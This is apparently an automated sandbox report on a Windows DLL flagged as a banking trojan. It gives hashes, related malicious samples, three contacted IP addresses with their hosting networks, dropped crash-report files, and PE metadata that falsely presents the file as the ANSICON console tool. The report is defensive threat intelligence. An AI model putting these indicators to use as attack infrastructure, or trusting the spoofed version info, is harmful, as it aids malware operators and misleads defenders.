            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:16
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal80.bank.troj.evad.winDLL@8/4@0/3
            EGA Information:Failed
            HDC Information:
            • Successful, ratio: 99.8% (good quality ratio 96.3%)
            • Quality average: 80.5%
            • Quality standard deviation: 25.5%
            HCA Information:
            • Successful, ratio: 92%
            • Number of executed functions: 21
            • Number of non-executed functions: 7
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            Warnings:
            Show All
            • Exclude process from analysis (whitelisted): taskhostw.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, svchost.exe
            • VT rate limit hit for: /opt/package/joesandbox/database/analysis/392885/sample/IHUVPJ4hXu.dll

            Simulations

            Behavior and APIs

            TimeTypeDescription
            23:41:10API Interceptor1x Sleep call for process: loaddll32.exe modified

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            159.203.93.122BJKPKLUPiD.dllGet hashmaliciousBrowse
              RuRxpMUPN7.dllGet hashmaliciousBrowse
                qMus8K6kXx.dllGet hashmaliciousBrowse
                  gsG7jGFk3I.dllGet hashmaliciousBrowse
                    15sV4KdrCN.dllGet hashmaliciousBrowse
                      Ce28zthEz1.dllGet hashmaliciousBrowse
                        Yvl2Gke3pv.dllGet hashmaliciousBrowse
                          1UmI5PSg3K.dllGet hashmaliciousBrowse
                            9eYYTTlVYi.dllGet hashmaliciousBrowse
                              Ce28zthEz1.dllGet hashmaliciousBrowse
                                15sV4KdrCN.dllGet hashmaliciousBrowse
                                  Yvl2Gke3pv.dllGet hashmaliciousBrowse
                                    1UmI5PSg3K.dllGet hashmaliciousBrowse
                                      9eYYTTlVYi.dllGet hashmaliciousBrowse
                                        9JXXdpfiQm.dllGet hashmaliciousBrowse
                                          t4KzTUSzkx.dllGet hashmaliciousBrowse
                                            POQ6m91rE7.dllGet hashmaliciousBrowse
                                              4ryCxciDFA.dllGet hashmaliciousBrowse
                                                9JXXdpfiQm.dllGet hashmaliciousBrowse
                                                  t4KzTUSzkx.dllGet hashmaliciousBrowse
                                                    50.116.27.97BJKPKLUPiD.dllGet hashmaliciousBrowse
                                                      RuRxpMUPN7.dllGet hashmaliciousBrowse
                                                        qMus8K6kXx.dllGet hashmaliciousBrowse
                                                          gsG7jGFk3I.dllGet hashmaliciousBrowse
                                                            15sV4KdrCN.dllGet hashmaliciousBrowse
                                                              Ce28zthEz1.dllGet hashmaliciousBrowse
                                                                Yvl2Gke3pv.dllGet hashmaliciousBrowse
                                                                  1UmI5PSg3K.dllGet hashmaliciousBrowse
                                                                    9eYYTTlVYi.dllGet hashmaliciousBrowse
                                                                      Ce28zthEz1.dllGet hashmaliciousBrowse
                                                                        15sV4KdrCN.dllGet hashmaliciousBrowse
                                                                          Yvl2Gke3pv.dllGet hashmaliciousBrowse
                                                                            1UmI5PSg3K.dllGet hashmaliciousBrowse
                                                                              9eYYTTlVYi.dllGet hashmaliciousBrowse
                                                                                9JXXdpfiQm.dllGet hashmaliciousBrowse
                                                                                  t4KzTUSzkx.dllGet hashmaliciousBrowse
                                                                                    POQ6m91rE7.dllGet hashmaliciousBrowse
                                                                                      4ryCxciDFA.dllGet hashmaliciousBrowse
                                                                                        9JXXdpfiQm.dllGet hashmaliciousBrowse
                                                                                          t4KzTUSzkx.dllGet hashmaliciousBrowse
                                                                                            94.247.168.64BJKPKLUPiD.dllGet hashmaliciousBrowse
                                                                                              RuRxpMUPN7.dllGet hashmaliciousBrowse
                                                                                                qMus8K6kXx.dllGet hashmaliciousBrowse
                                                                                                  gsG7jGFk3I.dllGet hashmaliciousBrowse
                                                                                                    15sV4KdrCN.dllGet hashmaliciousBrowse
                                                                                                      Ce28zthEz1.dllGet hashmaliciousBrowse
                                                                                                        Yvl2Gke3pv.dllGet hashmaliciousBrowse
                                                                                                          1UmI5PSg3K.dllGet hashmaliciousBrowse
                                                                                                            9eYYTTlVYi.dllGet hashmaliciousBrowse
                                                                                                              Ce28zthEz1.dllGet hashmaliciousBrowse
                                                                                                                15sV4KdrCN.dllGet hashmaliciousBrowse
                                                                                                                  Yvl2Gke3pv.dllGet hashmaliciousBrowse
                                                                                                                    1UmI5PSg3K.dllGet hashmaliciousBrowse
                                                                                                                      9eYYTTlVYi.dllGet hashmaliciousBrowse
                                                                                                                        9JXXdpfiQm.dllGet hashmaliciousBrowse
                                                                                                                          t4KzTUSzkx.dllGet hashmaliciousBrowse
                                                                                                                            POQ6m91rE7.dllGet hashmaliciousBrowse
                                                                                                                              4ryCxciDFA.dllGet hashmaliciousBrowse
                                                                                                                                9JXXdpfiQm.dllGet hashmaliciousBrowse
                                                                                                                                  t4KzTUSzkx.dllGet hashmaliciousBrowse

                                                                                                                                    Domains

                                                                                                                                    No context

                                                                                                                                    ASN

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                    DIGITALOCEAN-ASNUSBJKPKLUPiD.dllGet hashmaliciousBrowse
                                                                                                                                    • 159.203.93.122
                                                                                                                                    RuRxpMUPN7.dllGet hashmaliciousBrowse
                                                                                                                                    • 159.203.93.122
                                                                                                                                    qMus8K6kXx.dllGet hashmaliciousBrowse
                                                                                                                                    • 159.203.93.122
                                                                                                                                    gsG7jGFk3I.dllGet hashmaliciousBrowse
                                                                                                                                    • 159.203.93.122
                                                                                                                                    15sV4KdrCN.dllGet hashmaliciousBrowse
                                                                                                                                    • 159.203.93.122
                                                                                                                                    Ce28zthEz1.dllGet hashmaliciousBrowse
                                                                                                                                    • 159.203.93.122
                                                                                                                                    Yvl2Gke3pv.dllGet hashmaliciousBrowse
                                                                                                                                    • 159.203.93.122
                                                                                                                                    1UmI5PSg3K.dllGet hashmaliciousBrowse
                                                                                                                                    • 159.203.93.122
                                                                                                                                    9eYYTTlVYi.dllGet hashmaliciousBrowse
                                                                                                                                    • 159.203.93.122
                                                                                                                                    Ce28zthEz1.dllGet hashmaliciousBrowse
                                                                                                                                    • 159.203.93.122
                                                                                                                                    15sV4KdrCN.dllGet hashmaliciousBrowse
                                                                                                                                    • 159.203.93.122
                                                                                                                                    Yvl2Gke3pv.dllGet hashmaliciousBrowse
                                                                                                                                    • 159.203.93.122
                                                                                                                                    1UmI5PSg3K.dllGet hashmaliciousBrowse
                                                                                                                                    • 159.203.93.122
                                                                                                                                    9eYYTTlVYi.dllGet hashmaliciousBrowse
                                                                                                                                    • 159.203.93.122
                                                                                                                                    9JXXdpfiQm.dllGet hashmaliciousBrowse
                                                                                                                                    • 159.203.93.122
                                                                                                                                    t4KzTUSzkx.dllGet hashmaliciousBrowse
                                                                                                                                    • 159.203.93.122
                                                                                                                                    POQ6m91rE7.dllGet hashmaliciousBrowse
                                                                                                                                    • 159.203.93.122
                                                                                                                                    4ryCxciDFA.dllGet hashmaliciousBrowse
                                                                                                                                    • 159.203.93.122
                                                                                                                                    9JXXdpfiQm.dllGet hashmaliciousBrowse
                                                                                                                                    • 159.203.93.122
                                                                                                                                    t4KzTUSzkx.dllGet hashmaliciousBrowse
                                                                                                                                    • 159.203.93.122
                                                                                                                                    LINODE-APLinodeLLCUSBJKPKLUPiD.dllGet hashmaliciousBrowse
                                                                                                                                    • 50.116.27.97
                                                                                                                                    RuRxpMUPN7.dllGet hashmaliciousBrowse
                                                                                                                                    • 50.116.27.97
                                                                                                                                    qMus8K6kXx.dllGet hashmaliciousBrowse
                                                                                                                                    • 50.116.27.97
                                                                                                                                    gsG7jGFk3I.dllGet hashmaliciousBrowse
                                                                                                                                    • 50.116.27.97
                                                                                                                                    15sV4KdrCN.dllGet hashmaliciousBrowse
                                                                                                                                    • 50.116.27.97
                                                                                                                                    Ce28zthEz1.dllGet hashmaliciousBrowse
                                                                                                                                    • 50.116.27.97
                                                                                                                                    Yvl2Gke3pv.dllGet hashmaliciousBrowse
                                                                                                                                    • 50.116.27.97
                                                                                                                                    1UmI5PSg3K.dllGet hashmaliciousBrowse
                                                                                                                                    • 50.116.27.97
                                                                                                                                    9eYYTTlVYi.dllGet hashmaliciousBrowse
                                                                                                                                    • 50.116.27.97
                                                                                                                                    Ce28zthEz1.dllGet hashmaliciousBrowse
                                                                                                                                    • 50.116.27.97
                                                                                                                                    15sV4KdrCN.dllGet hashmaliciousBrowse
                                                                                                                                    • 50.116.27.97
                                                                                                                                    Yvl2Gke3pv.dllGet hashmaliciousBrowse
                                                                                                                                    • 50.116.27.97
                                                                                                                                    1UmI5PSg3K.dllGet hashmaliciousBrowse
                                                                                                                                    • 50.116.27.97
                                                                                                                                    9eYYTTlVYi.dllGet hashmaliciousBrowse
                                                                                                                                    • 50.116.27.97
                                                                                                                                    9JXXdpfiQm.dllGet hashmaliciousBrowse
                                                                                                                                    • 50.116.27.97
                                                                                                                                    t4KzTUSzkx.dllGet hashmaliciousBrowse
                                                                                                                                    • 50.116.27.97
                                                                                                                                    POQ6m91rE7.dllGet hashmaliciousBrowse
                                                                                                                                    • 50.116.27.97
                                                                                                                                    4ryCxciDFA.dllGet hashmaliciousBrowse
                                                                                                                                    • 50.116.27.97
                                                                                                                                    9JXXdpfiQm.dllGet hashmaliciousBrowse
                                                                                                                                    • 50.116.27.97
                                                                                                                                    t4KzTUSzkx.dllGet hashmaliciousBrowse
                                                                                                                                    • 50.116.27.97
                                                                                                                                    GLESYS-ASSEBJKPKLUPiD.dllGet hashmaliciousBrowse
                                                                                                                                    • 94.247.168.64
                                                                                                                                    RuRxpMUPN7.dllGet hashmaliciousBrowse
                                                                                                                                    • 94.247.168.64
                                                                                                                                    qMus8K6kXx.dllGet hashmaliciousBrowse
                                                                                                                                    • 94.247.168.64
                                                                                                                                    gsG7jGFk3I.dllGet hashmaliciousBrowse
                                                                                                                                    • 94.247.168.64
                                                                                                                                    15sV4KdrCN.dllGet hashmaliciousBrowse
                                                                                                                                    • 94.247.168.64
                                                                                                                                    Ce28zthEz1.dllGet hashmaliciousBrowse
                                                                                                                                    • 94.247.168.64
                                                                                                                                    Yvl2Gke3pv.dllGet hashmaliciousBrowse
                                                                                                                                    • 94.247.168.64
                                                                                                                                    1UmI5PSg3K.dllGet hashmaliciousBrowse
                                                                                                                                    • 94.247.168.64
                                                                                                                                    9eYYTTlVYi.dllGet hashmaliciousBrowse
                                                                                                                                    • 94.247.168.64
                                                                                                                                    Ce28zthEz1.dllGet hashmaliciousBrowse
                                                                                                                                    • 94.247.168.64
                                                                                                                                    15sV4KdrCN.dllGet hashmaliciousBrowse
                                                                                                                                    • 94.247.168.64
                                                                                                                                    Yvl2Gke3pv.dllGet hashmaliciousBrowse
                                                                                                                                    • 94.247.168.64
                                                                                                                                    1UmI5PSg3K.dllGet hashmaliciousBrowse
                                                                                                                                    • 94.247.168.64
                                                                                                                                    9eYYTTlVYi.dllGet hashmaliciousBrowse
                                                                                                                                    • 94.247.168.64
                                                                                                                                    9JXXdpfiQm.dllGet hashmaliciousBrowse
                                                                                                                                    • 94.247.168.64
                                                                                                                                    t4KzTUSzkx.dllGet hashmaliciousBrowse
                                                                                                                                    • 94.247.168.64
                                                                                                                                    POQ6m91rE7.dllGet hashmaliciousBrowse
                                                                                                                                    • 94.247.168.64
                                                                                                                                    4ryCxciDFA.dllGet hashmaliciousBrowse
                                                                                                                                    • 94.247.168.64
                                                                                                                                    9JXXdpfiQm.dllGet hashmaliciousBrowse
                                                                                                                                    • 94.247.168.64
                                                                                                                                    t4KzTUSzkx.dllGet hashmaliciousBrowse
                                                                                                                                    • 94.247.168.64

                                                                                                                                    JA3 Fingerprints

                                                                                                                                    No context

                                                                                                                                    Dropped Files

                                                                                                                                    No context

                                                                                                                                    Created / dropped Files

                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_259aeac81dd625d6a234674e48313673fc16336_160cf2be_19914593\Report.wer
                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):9238
                                                                                                                                    Entropy (8bit):3.761608026788726
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:96:SFt0pXyshy9hAlQC5Q56tpXIQcQ6c6n+hcEZcw3P+a+z+HbHgj6eugtYsaV9w72Q:SntsrLHUb+hjbjIq/u7s5S274Itb2n
                                                                                                                                    MD5:73211B114D48E7EFC3E978096E01E6BC
                                                                                                                                    SHA1:489E31DBCD4FFA4BA9DA917908691998B7871307
                                                                                                                                    SHA-256:C212876A4121C04E13123C5E1109D5C95BBDB6EB22F8A5249B181A25AC9E8161
                                                                                                                                    SHA-512:217469D814F00FDDD11D02E4FBB6B03E61926615FC13A20F28FB3C87B6B7A4A5D59ABFC6C287B73E78D56ADB23C70BA01ECEF61DD2FDBE88F9886BC8C4B20152
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.3.3.7.4.4.7.4.4.3.1.2.0.5.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.8.9.c.3.c.b.4.-.a.3.1.7.-.4.6.a.2.-.b.a.e.e.-.6.9.6.8.2.f.e.8.0.6.8.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.e.0.7.9.d.b.d.-.6.c.e.5.-.4.3.4.3.-.b.3.f.a.-.4.2.c.a.5.f.0.4.c.e.a.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.c.0.-.0.0.0.1.-.0.0.1.6.-.5.7.5.3.-.0.d.0.f.b.0.3.5.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.0.4././.0.4.:.1.0.:.5.0.:.5.4.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.
                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER2FD9.tmp.dmp
                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    File Type:Mini DuMP crash report, 15 streams, Tue Apr 20 06:41:15 2021, 0x1205a4 type
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):46470
                                                                                                                                    Entropy (8bit):1.9912138040891405
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:ScsAm/3wfgZ8l8TJ3KnfEyF2apzNeoyndEwPDAwXp7+JcM:xmr8laJ6fh2i8okbAwXpKn
                                                                                                                                    MD5:8FF70CF10D12D586BAFCEEBCB6AEF93C
                                                                                                                                    SHA1:1ACDF0E243BEEEA770A9B0DFA040FBF75E151DD4
                                                                                                                                    SHA-256:437F9E935DC3E51B8B7930B3249B366752E9CBF32E555CF46ED1948E79F7C43B
                                                                                                                                    SHA-512:37E6606546732926DFFFCB2CC96935F7DBA02FF81DB918F5ECE25A77EF8170FFD96FB2C9EA4B617B6CE8736DCEF8D7638ED3690FA3BA90AEE5070F8261EBF0F4
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview: MDMP....... ........w~`...................U...........B..............GenuineIntelW...........T..........._w~`.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER377B.tmp.WERInternalMetadata.xml
                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):8366
                                                                                                                                    Entropy (8bit):3.689665865936598
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:Rrl7r3GLNi086hpAG6YIHvSUyNUHgmfnS12QCpBMx89bhGEsfhZLm:RrlsNiH6vAG6YASUuUHgmfnS10hG3fh4
                                                                                                                                    MD5:36DCF0DC5C2F6661F18CF97B1638B3BB
                                                                                                                                    SHA1:0B50357DC02CE0202A894974FA9345D7E90C7A09
                                                                                                                                    SHA-256:439A477F2CEE4BA525FF8035028031FE07DE841AB01ED46DFADCE54E167654A1
                                                                                                                                    SHA-512:A7792D1E8E3E5F39AA2BAED7C29CF4D91A831290E8FCE303835448997E55FE3AF140A8EC3482B289D64A4FCD0C8D330506A3BDAC85ACB24CC2B31073EA5E62E8
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.8.0.<./.P.i.d.>.......
                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER3DF4.tmp.xml
                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):4658
                                                                                                                                    Entropy (8bit):4.427889106419037
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:48:cvIwSD8zsSJgtWI9bTWSC8B9s8fm8M4JVMFs9+q8v79KcQIcQw6UrFd:uITfg0iSNXRJb9KhKkw68Fd
                                                                                                                                    MD5:4CE5512562FD5E4C27F4AE608746ADF6
                                                                                                                                    SHA1:ADD86FEF957F6968923B6D6C8A7DA55DBC0E8F07
                                                                                                                                    SHA-256:59A8C7894DAAD47799804C25A7F201C3956E80D1CA5A3F46A65E1E39CCC63BB6
                                                                                                                                    SHA-512:57FBD0531E9B33BC8D1A1D32C899BA1DB5B906873CE18F3ADFE8DCBE9B55F39861386F7CC2214B0CA3FC6272C8F351D8A48DB45DABF8F0782747E769D639607E
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="954231" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                                                                                                    Static File Info

                                                                                                                                    General

                                                                                                                                    File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                    Entropy (8bit):7.5485592804649535
                                                                                                                                    TrID:
                                                                                                                                    • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                                    • DOS Executable Generic (2002/1) 0.20%
                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                    File name:IHUVPJ4hXu.dll
                                                                                                                                    File size:163840
                                                                                                                                    MD5:5b10d906d4ad48a9910a8cc551b2e697
                                                                                                                                    SHA1:9995dadc015c2003cdfe34c081a5f185aadb6263
                                                                                                                                    SHA256:61f03287190b9ce1e91fab24eddc302f411813ac49230d2e99335952eb3addc0
                                                                                                                                    SHA512:a31772c3ecbb7289e6fc43e81314c426dcc7671e1b9ee664ff31dbca2d921e9cab1f09d744661d11a70952e4278642769a98a9804314159c47cfa709f5197d20
                                                                                                                                    SSDEEP:3072:xWX2IjzzpM+PncPeY8+O3AU3HRIHPh3UGfXy0BHNkIv/ScbQQ2y0iNM0+y+N0tc:x42IfzNPnoeY8j3AsHGPXpHNj6rByM3
                                                                                                                                    File Content Preview:MZ......................@...........................................[}..[}..[}..[}...}..@.2..|..=.T..}....S.z|..@..._}..|...T|..V/C..|..V/E..|..Rich[}..............PE..L.....}`...........!.........f.......D.......P....@....................................

                                                                                                                                    File Icon

                                                                                                                                    Icon Hash:74f0e4ecccdce0e4

                                                                                                                                    Static PE Info

                                                                                                                                    General

                                                                                                                                    Entrypoint:0x424410
                                                                                                                                    Entrypoint Section:.text
                                                                                                                                    Digitally signed:false
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    Subsystem:windows gui
                                                                                                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                    Time Stamp:0x607DE4E1 [Mon Apr 19 20:15:29 2021 UTC]
                                                                                                                                    TLS Callbacks:
                                                                                                                                    CLR (.Net) Version:
                                                                                                                                    OS Version Major:5
                                                                                                                                    OS Version Minor:0
                                                                                                                                    File Version Major:5
                                                                                                                                    File Version Minor:0
                                                                                                                                    Subsystem Version Major:5
                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                    Import Hash:b84fd50f2389cfd5bd83e2cf062986d1

                                                                                                                                    Entrypoint Preview

                                                                                                                                    Instruction
                                                                                                                                    mov edx, 00000000h
                                                                                                                                    mov edx, 00000000h
                                                                                                                                    cmpss xmm1, xmm2, 03h
                                                                                                                                    sub eax, 00002233h
                                                                                                                                    mov edx, 00000000h
                                                                                                                                    mov edx, 00000000h
                                                                                                                                    mov edx, 00000000h
                                                                                                                                    mov edx, 00000000h
                                                                                                                                    mov edx, 00000000h
                                                                                                                                    mov edx, 00000000h
                                                                                                                                    cmpss xmm1, xmm2, 03h
                                                                                                                                    cmp edx, 00000000h
                                                                                                                                    mov eax, 00000000h
                                                                                                                                    mov eax, 00000000h
                                                                                                                                    mov eax, 00000000h
                                                                                                                                    mov eax, 00000000h
                                                                                                                                    mov eax, 00000000h
                                                                                                                                    mov eax, 00000000h
                                                                                                                                    mov eax, 00000000h
                                                                                                                                    mov eax, 00000000h
                                                                                                                                    mov eax, 00000000h
                                                                                                                                    mov eax, 00000000h
                                                                                                                                    mov eax, 00000000h
                                                                                                                                    mov eax, 00000000h
                                                                                                                                    mov eax, 00000000h
                                                                                                                                    mov eax, 00000000h
                                                                                                                                    mov eax, 00000000h
                                                                                                                                    je 00007F9B20A336DBh
                                                                                                                                    mov eax, 00000000h
                                                                                                                                    mov eax, 00000000h
                                                                                                                                    mov eax, 00000000h
                                                                                                                                    mov eax, 00000000h
                                                                                                                                    mov eax, 00000000h
                                                                                                                                    mov eax, 00000000h
                                                                                                                                    mov eax, 00000000h
                                                                                                                                    mov eax, 00000000h
                                                                                                                                    mov eax, 00000000h
                                                                                                                                    mov eax, 00000000h
                                                                                                                                    mov eax, 00000000h
                                                                                                                                    mov eax, 00000000h

                                                                                                                                    Data Directories

                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x10010x0.text
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x2768c0x59.rdata
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x340.rsrc
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x2d0000x14c.reloc
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x250400x38.rdata
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x250000x3c.rdata
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                    Sections

                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                    .text0x10000x2356e0x23600False0.761560015459data7.55877156847IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                    .rdata0x250000x28420x2a00False0.791573660714data7.53164670284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                    .pdata0x280000x35880x1600False0.783380681818MMDF mailbox7.34765964879IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                    .rsrc0x2c0000x3400x400False0.390625data2.73456990044IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                    .reloc0x2d0000x14c0x200False0.62890625data4.21021599876IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                    Resources

                                                                                                                                    NameRVASizeTypeLanguageCountry
                                                                                                                                    RT_VERSION0x2c0600x2e0dataEnglishUnited States

                                                                                                                                    Imports

                                                                                                                                    DLLImport
                                                                                                                                    KERNEL32.dllCloseHandle, OpenSemaphoreW, LoadLibraryExA, GetModuleHandleW, OutputDebugStringA, GetProfileSectionW
                                                                                                                                    OPENGL32.dllglTexSubImage1D
                                                                                                                                    ole32.dllCreateStreamOnHGlobal
                                                                                                                                    USER32.dllTranslateMessage
                                                                                                                                    ADVAPI32.dllRegLoadAppKeyW

                                                                                                                                    Version Infos

                                                                                                                                    DescriptionData
                                                                                                                                    LegalCopyrightFreeware
                                                                                                                                    InternalNameANSI32
                                                                                                                                    FileVersion1.66
                                                                                                                                    CompanyNameJason Hood
                                                                                                                                    Commentshttp://ansicon.adoxa.vze.com/
                                                                                                                                    ProductNameANSICON
                                                                                                                                    ProductVersion1.66
                                                                                                                                    FileDescriptionANSI Console
                                                                                                                                    OriginalFilenameANSI32.dll
                                                                                                                                    Translation0x0409 0x04b0

                                                                                                                                    Possible Origin

